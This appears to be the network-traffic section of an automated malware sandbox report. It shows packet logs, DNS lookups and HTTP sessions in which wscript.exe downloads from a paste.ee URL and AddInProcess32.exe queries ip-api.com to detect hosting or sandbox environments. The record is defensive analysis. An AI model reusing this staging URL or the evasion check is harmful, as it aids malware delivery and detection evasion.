Oct 7, 2024 17:09:17.570960045 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.625741959 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.625756025 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.625909090 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.625922918 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.625982046 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.655117035 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.655132055 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.655200958 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.655230999 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.655301094 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.655536890 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.655550003 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.655602932 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.655608892 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.655646086 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.656033039 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656044960 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656107903 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.656114101 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656148911 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.656476021 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656487942 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656538010 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.656543970 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656595945 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.656863928 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656876087 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656936884 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.656943083 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.656979084 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.657315016 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.657327890 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.657385111 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.657391071 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.657428980 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.657694101 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.657706022 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.657754898 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.657762051 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.657783985 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.657804012 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.741242886 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741262913 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741333961 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.741345882 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741398096 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741401911 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.741410017 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741449118 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.741470098 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741503000 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741533041 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.741553068 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.741960049 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.741974115 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742024899 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.742031097 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742068052 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.742317915 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742330074 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742386103 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.742392063 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742434025 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.742609978 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742623091 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742667913 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.742674112 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.742702961 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.742712975 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.743005037 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743021965 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743076086 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.743081093 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743118048 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.743424892 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743438005 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743484974 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.743489981 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743515015 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.743532896 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.743607044 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743619919 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743674040 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.743679047 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.743721962 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.827544928 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.827559948 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.827636957 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.827653885 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.827698946 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.828033924 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828052998 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828119040 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.828125954 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828167915 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.828569889 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828582048 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828636885 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.828644037 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828690052 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.828860998 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828874111 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828932047 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.828938961 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.828978062 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.829219103 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.829231024 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.829288006 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.829293966 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.829338074 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.829895020 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.829910994 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.829968929 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.829973936 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.830023050 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.830073118 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.830085039 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.830143929 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.830148935 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.830189943 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.830418110 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.830430984 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.830487013 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.830492973 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.830532074 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.914711952 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.914733887 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.914784908 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.914788961 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.914799929 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.914840937 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.914849043 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.914905071 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.915167093 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.915180922 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.915231943 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.915241003 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.915288925 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.915699005 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.915713072 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.915772915 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.915779114 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.915817022 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.916071892 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.916091919 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.916150093 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.916156054 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.916196108 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.916748047 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.916760921 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.916814089 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.916821957 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.916871071 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.917280912 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.917294979 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.917349100 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.917354107 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.917398930 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.917654037 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.917668104 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.917721987 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:17.917728901 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:17.917774916 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.001250982 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.001267910 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.001373053 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.001394033 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.001553059 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.001750946 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.001763105 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.001935005 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.001941919 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.001986980 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.002163887 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.002176046 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.002233028 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.002238989 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.002281904 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.002753973 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.002765894 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.002820969 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.002825975 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.002866983 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.003206968 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.003220081 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.003271103 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.003277063 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.003314972 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.003756046 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.003768921 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.003819942 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.003827095 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.003865957 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.004179001 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.004192114 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.004229069 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.004235983 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.004281998 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.004549980 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.004563093 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.004617929 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.004622936 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.004662037 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.367566109 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.367583036 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.367651939 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.367667913 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.367714882 CEST  49709        443        192.168.2.7      185.199.110.133
Oct 7, 2024 17:09:18.368035078 CEST  443          49709      185.199.110.133  192.168.2.7
Oct 7, 2024 17:09:18.368046999 CEST  443          49709      185.199.110.133  192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368092060 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368098021 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368134975 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368452072 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368463993 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368520021 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368525028 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368561029 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368906975 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368917942 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368967056 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368973017 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369008064 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369317055 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369330883 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369398117 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369404078 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369443893 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369689941 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369702101 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369755983 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369761944 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369801044 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370126009 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370137930 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370165110 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370187998 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370193958 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370209932 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370223045 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370239019 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370263100 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.375267982 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:21.457122087 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:09:21.462225914 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:09:21.462368965 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:09:21.463181973 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:09:21.468106031 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:09:21.933489084 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:09:21.983004093 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:10:54.381762981 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:10:54.381942034 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:11:01.939011097 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:11:01.944025993 CEST8049744208.95.112.1192.168.2.7
                                                                        Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                                                        Oct 7, 2024 17:09:04.693470955 CEST  54787        53         192.168.2.7  1.1.1.1
                                                                        Oct 7, 2024 17:09:04.703460932 CEST  53           54787      1.1.1.1      192.168.2.7
                                                                        Oct 7, 2024 17:09:14.637624979 CEST  61593        53         192.168.2.7  1.1.1.1
                                                                        Oct 7, 2024 17:09:14.739252090 CEST  53           61593      1.1.1.1      192.168.2.7
                                                                        Oct 7, 2024 17:09:21.420854092 CEST  60053        53         192.168.2.7  1.1.1.1
                                                                        Oct 7, 2024 17:09:21.429907084 CEST  53           60053      1.1.1.1      192.168.2.7
                                                                        Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
                                                                        Oct 7, 2024 17:09:04.693470955 CEST  192.168.2.7  1.1.1.1  0x361a    Standard query (0)  paste.ee                   A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:14.637624979 CEST  192.168.2.7  1.1.1.1  0x70d4    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:21.420854092 CEST  192.168.2.7  1.1.1.1  0x145c    Standard query (0)  ip-api.com                 A (IP address)  IN (0x0001)  false
                                                                        Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
                                                                        Oct 7, 2024 17:09:04.703460932 CEST  1.1.1.1    192.168.2.7  0x361a    No error (0)  paste.ee                          188.114.97.3     A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:04.703460932 CEST  1.1.1.1    192.168.2.7  0x361a    No error (0)  paste.ee                          188.114.96.3     A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST  1.1.1.1    192.168.2.7  0x70d4    No error (0)  raw.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST  1.1.1.1    192.168.2.7  0x70d4    No error (0)  raw.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST  1.1.1.1    192.168.2.7  0x70d4    No error (0)  raw.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST  1.1.1.1    192.168.2.7  0x70d4    No error (0)  raw.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)  false
                                                                        Oct 7, 2024 17:09:21.429907084 CEST  1.1.1.1    192.168.2.7  0x145c    No error (0)  ip-api.com                        208.95.112.1     A (IP address)  IN (0x0001)  false
                                                                        • paste.ee
                                                                        • raw.githubusercontent.com
                                                                        • ip-api.com
                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        0           192.168.2.7  49699        188.114.97.3    80                5368  C:\Windows\System32\wscript.exe
                                                                        Timestamp                            Bytes transferred  Direction  Data
                                                                        Oct 7, 2024 17:09:04.713771105 CEST  173                OUT        GET /d/gvOd3 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                        Host: paste.ee
                                                                        Oct 7, 2024 17:09:05.292005062 CEST  806                IN         HTTP/1.1 301 Moved Permanently
                                                                        Date: Mon, 07 Oct 2024 15:09:05 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Location: https://paste.ee/d/gvOd3
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAkxdMFP%2BeWexVZKkxFK0MBaFaxhpZ8egLtbVuwSGZ8TFJoCqCydAJ1E8gkO4em%2FsK4gl6%2FGlFhN6P0lG1wrZbn%2FlF0GdEibbHh3RQ8qYaUzkL3Kp5jUhYZMqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                        Server: cloudflare
                                                                        CF-RAY: 8ceecf6adfdf0f80-EWR
                                                                        Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        1           192.168.2.7  49744        208.95.112.1    80                7360  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Timestamp                            Bytes transferred  Direction  Data
                                                                        Oct 7, 2024 17:09:21.463181973 CEST  80                 OUT        GET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Oct 7, 2024 17:09:21.933489084 CEST  175                IN         HTTP/1.1 200 OK
                                                                        Date: Mon, 07 Oct 2024 15:09:21 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        0           192.168.2.7  49700        188.114.97.3    443               5368  C:\Windows\System32\wscript.exe
                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                        2024-10-07 15:09:05 UTC  173                OUT        GET /d/gvOd3 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                        Host: paste.ee
                                                                        2024-10-07 15:09:07 UTC  1198               IN         HTTP/1.1 200 OK
                                                                        Date: Mon, 07 Oct 2024 15:09:06 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Cache-Control: max-age=2592000
                                                                        strict-transport-security: max-age=63072000
                                                                        x-frame-options: DENY
                                                                        x-content-type-options: nosniff
                                                                        x-xss-protection: 1; mode=block
                                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                        CF-Cache-Status: DYNAMIC
